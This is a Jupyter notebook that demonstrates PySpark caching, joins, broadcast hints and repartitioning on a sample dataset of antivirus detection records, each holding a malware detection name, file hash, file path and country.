In [149]:
from pyspark import SparkContext
from pyspark import SparkConf,StorageLevel
from pyspark.sql import SparkSession
from pyspark.sql.functions import dense_rank,rank,row_number,max,sum,broadcast,col,lit,collect_set,explode,flatten
from pyspark.sql.functions import approx_count_distinct,collect_list
from pyspark.sql.functions import collect_set,sum,avg,max,countDistinct,count
from pyspark.sql.functions import first, last, kurtosis, min, mean, skewness 
from pyspark.sql.functions import stddev, stddev_samp, stddev_pop, sumDistinct
from pyspark.sql.functions import variance,var_samp,  var_pop
from pyspark.sql.window import Window
import boto3
import os 
In [2]:
spark = SparkSession.builder.master("local").appName("PySpark").getOrCreate()
In [3]:
path = "test-table/"
In [55]:
df = spark.read.json(path)
In [51]:
df.printSchema()
root
 |-- detection: struct (nullable = true)
 |    |-- filename: string (nullable = true)
 |    |-- filepath: string (nullable = true)
 |    |-- filesize: long (nullable = true)
 |    |-- name: string (nullable = true)
 |-- hash: string (nullable = true)
 |-- metadata: struct (nullable = true)
 |    |-- cmdline: string (nullable = true)
 |    |-- country: string (nullable = true)
 |    |-- os_name: string (nullable = true)
 |    |-- os_vmajor: string (nullable = true)
 |    |-- os_vminor: string (nullable = true)
 |    |-- parentproc: string (nullable = true)
 |    |-- parentsize: long (nullable = true)
 |    |-- timestamp: string (nullable = true)
 |-- dt: date (nullable = true)

In [5]:
df.createGlobalTempView("data")
In [6]:
df.show(3)
+--------------------+--------------------+--------------------+----------+
|           detection|                hash|            metadata|        dt|
+--------------------+--------------------+--------------------+----------+
|[dup2patcher.dll,...|002b106a99023edc6...|[, IT, Windows, 6...|2018-11-02|
|[setup.exe, C:\Us...|00d0a73c885e1d7b9...|[Global\\\\UsGthr...|2018-11-02|
|[wab.exe, E:\WIND...|014d681f318edb59f...|[, MY, Windows, 6...|2018-11-02|
+--------------------+--------------------+--------------------+----------+
only showing top 3 rows

1. Cache & Persist

In [7]:
df.cache()
Out[7]:
DataFrame[detection: struct<filename:string,filepath:string,filesize:bigint,name:string>, hash: string, metadata: struct<cmdline:string,country:string,os_name:string,os_vmajor:string,os_vminor:string,parentproc:string,parentsize:bigint,timestamp:string>, dt: date]
In [7]:
df.cache().explain(1000)
== Parsed Logical Plan ==
Relation[detection#6,hash#7,metadata#8,dt#9] json

== Analyzed Logical Plan ==
detection: struct<filename:string,filepath:string,filesize:bigint,name:string>, hash: string, metadata: struct<cmdline:string,country:string,os_name:string,os_vmajor:string,os_vminor:string,parentproc:string,parentsize:bigint,timestamp:string>, dt: date
Relation[detection#6,hash#7,metadata#8,dt#9] json

== Optimized Logical Plan ==
InMemoryRelation [detection#6, hash#7, metadata#8, dt#9], StorageLevel(disk, memory, deserialized, 1 replicas)
   +- *(1) FileScan json [detection#6,hash#7,metadata#8,dt#9] Batched: false, Format: JSON, Location: InMemoryFileIndex[file:/Users/sheruwala/Desktop/Doc/avira/test-table], PartitionCount: 3, PartitionFilters: [], PushedFilters: [], ReadSchema: struct<detection:struct<filename:string,filepath:string,filesize:bigint,name:string>,hash:string,...

== Physical Plan ==
InMemoryTableScan [detection#6, hash#7, metadata#8, dt#9]
   +- InMemoryRelation [detection#6, hash#7, metadata#8, dt#9], StorageLevel(disk, memory, deserialized, 1 replicas)
         +- *(1) FileScan json [detection#6,hash#7,metadata#8,dt#9] Batched: false, Format: JSON, Location: InMemoryFileIndex[file:/Users/sheruwala/Desktop/Doc/avira/test-table], PartitionCount: 3, PartitionFilters: [], PushedFilters: [], ReadSchema: struct<detection:struct<filename:string,filepath:string,filesize:bigint,name:string>,hash:string,...
In [8]:
df.persist(StorageLevel.MEMORY_ONLY)
Out[8]:
DataFrame[detection: struct<filename:string,filepath:string,filesize:bigint,name:string>, hash: string, metadata: struct<cmdline:string,country:string,os_name:string,os_vmajor:string,os_vminor:string,parentproc:string,parentsize:bigint,timestamp:string>, dt: date]
In [9]:
df.persist(StorageLevel.MEMORY_ONLY_SER)
Out[9]:
DataFrame[detection: struct<filename:string,filepath:string,filesize:bigint,name:string>, hash: string, metadata: struct<cmdline:string,country:string,os_name:string,os_vmajor:string,os_vminor:string,parentproc:string,parentsize:bigint,timestamp:string>, dt: date]
In [10]:
df.persist(StorageLevel.MEMORY_AND_DISK)
Out[10]:
DataFrame[detection: struct<filename:string,filepath:string,filesize:bigint,name:string>, hash: string, metadata: struct<cmdline:string,country:string,os_name:string,os_vmajor:string,os_vminor:string,parentproc:string,parentsize:bigint,timestamp:string>, dt: date]
In [11]:
df.persist(StorageLevel.DISK_ONLY)
Out[11]:
DataFrame[detection: struct<filename:string,filepath:string,filesize:bigint,name:string>, hash: string, metadata: struct<cmdline:string,country:string,os_name:string,os_vmajor:string,os_vminor:string,parentproc:string,parentsize:bigint,timestamp:string>, dt: date]

2. Unpersist or remove all cached dataframes

In [12]:
spark.catalog.clearCache()
In [16]:
spark.catalog.dropGlobalTempView("data")
In [14]:
df.unpersist()
Out[14]:
DataFrame[detection: struct<filename:string,filepath:string,filesize:bigint,name:string>, hash: string, metadata: struct<cmdline:string,country:string,os_name:string,os_vmajor:string,os_vminor:string,parentproc:string,parentsize:bigint,timestamp:string>, dt: date]

3. Types of joins

In [17]:
df1 = df.join(df, on=['hash'], how='left')
In [19]:
df1.show(3)
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
|                hash|           detection|            metadata|        dt|           detection|            metadata|        dt|
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|[dup2patcher.dll,...|[, IT, Windows, 1...|2018-11-01|
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|[dup2patcher.dll,...|[, TW, Windows, 6...|2018-11-04|
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
only showing top 3 rows

In [20]:
df1 = df.join(df, on=['hash'], how='right')
In [21]:
df1.show(3)
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
|                hash|           detection|            metadata|        dt|           detection|            metadata|        dt|
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 1...|2018-11-01|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|
|002b106a99023edc6...|[dup2patcher.dll,...|[, TW, Windows, 6...|2018-11-04|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
only showing top 3 rows

In [22]:
df1 = df.join(df, on=['hash'], how='full')
In [23]:
df1.show(3)
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
|                hash|           detection|            metadata|        dt|           detection|            metadata|        dt|
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|[dup2patcher.dll,...|[, IT, Windows, 1...|2018-11-01|
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|[dup2patcher.dll,...|[, TW, Windows, 6...|2018-11-04|
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
only showing top 3 rows

In [24]:
df1 = df.join(df, on=['hash'], how='left_anti')
In [25]:
df1.show(3)
+----+---------+--------+---+
|hash|detection|metadata| dt|
+----+---------+--------+---+
+----+---------+--------+---+

In [27]:
df1 = df.join(df, on=['hash'], how='right_outer')
In [29]:
df1.show(3)
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
|                hash|           detection|            metadata|        dt|           detection|            metadata|        dt|
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|
|002b106a99023edc6...|[dup2patcher.dll,...|[, IT, Windows, 1...|2018-11-01|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|
|002b106a99023edc6...|[dup2patcher.dll,...|[, TW, Windows, 6...|2018-11-04|[dup2patcher.dll,...|[, IT, Windows, 6...|2018-11-02|
+--------------------+--------------------+--------------------+----------+--------------------+--------------------+----------+
only showing top 3 rows

4. Hint for broadcast join

In [35]:
df1 = df.join(broadcast(df), on=['hash'], how='inner')
In [36]:
df1 = df.join(df.hint("broadcast"), on=['hash'], how='inner')

5. Repartition and Coalesce

In [45]:
spark.conf.set("spark.sql.files.maxPartitionBytes", 1000000)
spark.conf.get("spark.sql.files.maxPartitionBytes")
Out[45]:
'1000000'
In [57]:
df = spark.read.json(path)
In [58]:
df.rdd.getNumPartitions()
Out[58]:
17
In [59]:
df = df.repartition(100)
In [60]:
df.rdd.glom().collect()
Out[60]:
[[Row(detection=Row(filename='avscan-20181102-150544-59b2ad91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1d620a3\\AVSCAN-20181102-150530-575D3AEB\\AVSCAN-20181102-150544-59B2AD91', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='57cae62020ab1d6334a5869e4072e9ecca8566d9238618472c6da7a390ccce1b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221522-5e1caa67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221522-5E1CAA67', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe992_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe992 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T17:14:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rtcru32.exe', filepath='D:\\1 My Master 183\\Driverpack\\drivers\\DP_CardReader_17071\\Realtek\\FORCED\\NTx86\\5227_10.0.15063.21302\\RtCRU32.exe', filesize=3648000, name='W32/Sality.AT.#M1.#R1'), hash='6a7bc00145c3d6cf6e57764d07bac4309627705cd7139ccd3080e06cd251a623', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe8_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T10:06:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000276f2', filepath='C:\\Windows\\Temp\\5f1f5a26-64d4-4ede-8d54-7fccfe113629\\tmp00000160\\tmp000276f2', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T09:13:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whgdata.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\whgdata\\whgdata.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spinstall.exe', filepath='G:\\SPDMTK FILES\\Lenovo\\Lenovo_A606_S039_150604_ROW_(by_firmwarefile.com)\\Lenovo_A606_S039_150604_ROW\\Driver\\Auto Installer Driver v1.1236.00\\SmartPhoneDriver\\x86\\spinstall.exe', filesize=640000, name='W32/Sality.AG.#M1.#R1'), hash='26a1024a60ce7cd98daedd9eb498992487bb68d14863353108f6eded6ad73c7a', metadata=Row(cmdline='\\\\\\/onboot', country='DK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-02T04:05:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A00852FB0394596BBBFF9EA372F6FC734B90BC5E4D48C33CCA9BC944E313232', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-213026-d2aa69ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_48bce7c3\\AVSCAN-20181101-212841-C56C85B6\\AVSCAN-20181101-213026-D2AA69CE', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:30:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setuperror.exe', filepath='\\\\?\\D:\\upgrate\\sources\\setuperror.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3032cf6376bee15074add20c4bb2ae8e1e266689fc8cb602594921a479c81214', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:54:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage5_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE5_SE\\STAGE5_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001e203', filepath='C:\\Windows\\Temp\\5f1f5a26-64d4-4ede-8d54-7fccfe113629\\tmp00000160\\tmp0001e203', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T09:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='giao an lop 5 ca nam 20172018 soan rat chi tiet cktkn gdkns gdbvmt bien dao.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\Giao an lop 5 ca nam 20172018 soan rat chi tiet CKTKN GDKNS GDBVMT bien dao.exe', filesize=3456000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4b5623ed6d755e5d916540b19be673c5c238a553fe194d57cd0137d382532598', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T11:13:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe567_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe567 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bi rate.bat', filepath='D:\\DOKUMENKU\\LPS GAB\\BI RATE\\BI RATE.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:10:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155800-e04c3bda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155800-E04C3BDA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4175421\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180050-82347832', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e06872d6\\AVSCAN-20181102-174830-1DEC0225\\AVSCAN-20181102-180050-82347832', filesize=512000, name='TR/Dropper.VB.hjyel.#M1.#R1'), hash='1b4dae080539bb15af72e013862dd5bc1360879b7fdaa08f2a4128d714da3a5f', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0147459.exe', filepath='N:\\System Volume Information\\_restore{5ADD86DC-9807-43A0-B9F3-6D715E388D69}\\RP29\\A0147459.exe', filesize=1664000, name='TR/Patched.Gen.#M300.#R2947'), hash='318400d8599db859dee1df539205e07a2f208e3457e98fe7beaadc63c0f74836', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:46:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\19DB880A0AC3F7A8DC75D7CDB88A02B5CA846E896BC92A1A68B5C1B72EE68205', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='19db880a0ac3f7a8dc75d7cdb88a02b5ca846e896bc92a1a68b5c1b72ee68205', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C4F8770D08A4D70D44FEFA5205045151274C81CCAB9E3D90F26B7F641561EBF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c17335b378c7ebed353d99e40cca532cde33076', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\0c17335b378c7ebed353d99e40cca532cde33076', filesize=196000, name='PUA/InstallCore.#M1.#R1'), hash='03074ae84126999407eb454686c174cf93648dd3c1c27522a694ff83c2b0ac8b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:36:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00004b01', filepath='C:\\Windows\\Temp\\tmp00001759\\tmp00004b01', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='2bb3a4ed28e197ac363bd4f053e8ed5aca35b07d8b95b92369e092aa70b8b92d', metadata=Row(cmdline='-k bdx -s scan', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T11:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:59Z'), dt=datetime.date(2018, 11, 2)),
